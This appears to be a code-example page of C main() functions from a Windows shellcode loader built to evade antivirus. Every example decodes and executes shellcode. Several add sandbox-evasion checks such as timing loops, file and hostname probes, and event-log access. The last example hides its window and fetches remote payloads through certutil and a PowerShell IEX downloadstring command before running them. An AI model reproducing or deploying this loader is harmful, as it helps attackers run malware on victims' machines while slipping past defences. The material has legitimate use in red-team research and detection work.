Exemple #1
0
int main (int argc, char **argv)
{
	unsigned char *shellcode;
	unsigned char buffer[]="the encoded shellcode here";

	int size = sizeof(buffer);

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
}
Exemple #2
0
int main (int argc, char **argv)
{
	//unsigned char *buffer;
	unsigned char *shellcode;
	unsigned char buffer[]=	"encrypted shellcode";

	WSADATA WsaDat;
	if(WSAStartup(MAKEWORD(2,2),&WsaDat)!=0)
	{
		WSACleanup();
		return 0;
	}
	
	SOCKET Socket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if(Socket==INVALID_SOCKET)
	{
		WSACleanup();
		return 0;
	}
	
	SOCKADDR_IN serverInf;
	serverInf.sin_family=AF_INET;
	serverInf.sin_addr.s_addr=INADDR_ANY;
	serverInf.sin_port=htons(4444);

	if(bind(Socket,(SOCKADDR*)(&serverInf),sizeof(serverInf))==SOCKET_ERROR)
	{
		WSACleanup();
		return 0;
	}

	listen(Socket,1);

	SOCKET TempSock=SOCKET_ERROR;
	while(TempSock==SOCKET_ERROR)
	{
		TempSock=accept(Socket,NULL,NULL);
	}
	Socket=TempSock;

	char *szMessage="Welcome to the server!\r\n";
	send(Socket,szMessage,strlen(szMessage),0);

	shutdown(Socket,SD_SEND);

	closesocket(Socket);

	WSACleanup();


	int size = sizeof(buffer);

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
}
Exemple #3
0
int main (int argc, char **argv)
{
	unsigned char *shellcode;
	unsigned char buffer[]= "strstr.c";

 	if(strstr(argv[0], "strstr.exe") > 0)
	{
		int size = sizeof(buffer);

		shellcode = decode_shellcode(buffer,shellcode,size);
		exec_shellcode(shellcode);
	}
}
Exemple #4
0
int main (int argc, char **argv)
{
	unsigned char *shellcode;
	unsigned char buffer[]= "encoded shellcode";

  HANDLE h;
  h = OpenEventLog( NULL, "Application");
  if (h == NULL)
	  printf("error\n");

	int size = sizeof(buffer);

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
}
Exemple #5
0
int main (int argc, char **argv)
{
	//unsigned char *buffer;
	unsigned char *shellcode;
	unsigned char buffer[]= "encoded shellcode";

	int x,y;
	for (x=1; x<10000; x++)
	{
		for (y=1; y<10000; y++)
		{
			int a=cos(x);
			int b=cos(y);
			double c=sin(x);
			double d=sin(y);
		}
	}


	int size = sizeof(buffer);

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
}
Exemple #6
0
int main (int argc, char **argv)
{
	#ifdef QUIET
		ShowWindow(GetConsoleWindow(), SW_HIDE);
	#endif
		
	char *fvalue = NULL;
	char *uvalue = NULL;

	int index;
	int c;

	opterr = 0;

	// do evading here with fopen technique
	#ifdef SANDBOX_FOPEN
		#ifdef PRINT_DEBUG
		printf("use fopen sandbox escape\n");
		#endif
		FILE *fp = fopen("c:\\windows\\system.ini", "rb");
		if (fp == NULL)
			return 0;
		fclose(fp);
	#endif

	//evading with gethostbyname technique
	#ifdef KVALUE
		#ifdef PRINT_DEBUG
		printf("use  gethostbyname sandbox evasion\n");
		#endif
		struct hostent *hp = gethostbyname(KVALUE);
		if (hp != NULL) 		
			exit(0);

	#endif

//#if defined(DOWNLOADCERTUTIL) || defined(DOWNLOADPOWERSHELL)
//download a file and write to disk
#ifdef DOWNLOADCERTUTIL
	char download[500];  //how not to do it...
	sprintf(download,"certutil.exe -urlcache -split -f %s",argv[2]);
	#ifdef PRINT_DEBUG
		printf("url: %s\n", download);
	#endif
	system(download);
	#ifdef PRINT_DEBUG
		printf("download done\n");
	#endif
#endif

#ifdef DOWNLOADPOWERSHELL
	char download[500];
	sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadstring('%s'))\"",argv[2]);
	#ifdef PRINT_DEBUG
		printf("url: %s\n", download);
	#endif
	system(download);
#endif

	#ifdef LVALUE
		fvalue=argv[1];
	#endif

	#ifdef PRINT_DEBUG
		printf ("fvalue = %s ", fvalue);
		printf ("uvalue = %s \n", uvalue);
		for (index = optind; index < argc; index++)
			printf ("Non-option argument %s\n", argv[index]);
	#endif

// compute #defines from defs.h
#ifdef FVALUE
	int size = strlen(FVALUE);
	fvalue=(char*)malloc(size);
	strcpy(fvalue,FVALUE);
#endif

#ifdef UVALUE
	int size = strlen(UVALUE);
	uvalue=(char*)malloc(size);
	strcpy(uvalue,UVALUE);
#endif

	// exec shellcode from a given file or from defs.h
	if (fvalue)
	{
		unsigned char *buffer;
		unsigned char *shellcode;
		int size;
//#ifndef FVALUE
#ifdef LVALUE
	#ifdef PRINT_DEBUG
		printf("exec shellcode from file\n");
	#endif
		size = get_filesize(fvalue);
		buffer = load_textfile(fvalue, buffer, size);
#endif
	#ifdef FVALUE
		size = strlen (FVALUE);
		buffer = FVALUE;
	#endif

	#ifdef ENCRYPT 
		#ifdef PRINT_DEBUG
		printf ("size %d\n",size);
		//printf ("%s\n",FVALUE);
		printf("exec shellcode with decode_shellcode\n");
		#endif
		shellcode = decode_shellcode(buffer,shellcode,size);
	#endif

	#ifndef ENCRYPT
		#ifdef LVALUE
		unsigned char *buf = buffer; //that does the trick, although not nice. Needed for raw sc execution with -l
		#endif
	#ifndef ASCIIMSF 
	#ifndef DOWNLOADEXECSC
		#ifdef PRINT_DEBUG
		printf("exec shellcode without decode_shellcode\n");
		#endif
		shellcode = buf;
	#endif
	#endif
	#endif

	#ifndef X64 
	#ifndef ASCIIMSF
		exec_shellcode(shellcode);
	#endif
	#ifdef ASCIIMSF
		exec_shellcode_ASCIIMSF(shellcode);
	#endif
	#endif
	#ifdef X64
		exec_shellcode64(shellcode);
	#endif
	}
	// exec from url
#ifdef UVALUE
	else if (uvalue)
	{
		#ifdef PRINT_DEBUG
			printf("exec shellcode from url\n");
		#endif

		char *sh_filename;
		sh_filename = ie_download(uvalue, sh_filename);
		int x=strlen(sh_filename);
		
#ifdef PRINT_DEBUG	
		printf("\n\n%d\n\n", x);
#endif

		unsigned char *buffer;
		unsigned char *shellcode;

		int size = get_filesize(sh_filename);
		buffer = load_textfile(sh_filename, buffer, size);
#ifdef ENCRYPT
		shellcode = decode_shellcode(buffer,shellcode,size);
#else
		shellcode = buf;
#endif
#ifndef X64 
		exec_shellcode(shellcode);
#endif
#ifdef X64
		exec_shellcode64(shellcode);
#endif
	}
#endif

#ifdef DOWNLOADEXECSC
	unsigned char *shellcode = downloadshellcode(argv[1]);
#ifndef X64
	exec_shellcode(shellcode);
#endif
#ifdef X64
	exec_shellcode64(shellcode);
#endif
#endif

	return 0;
}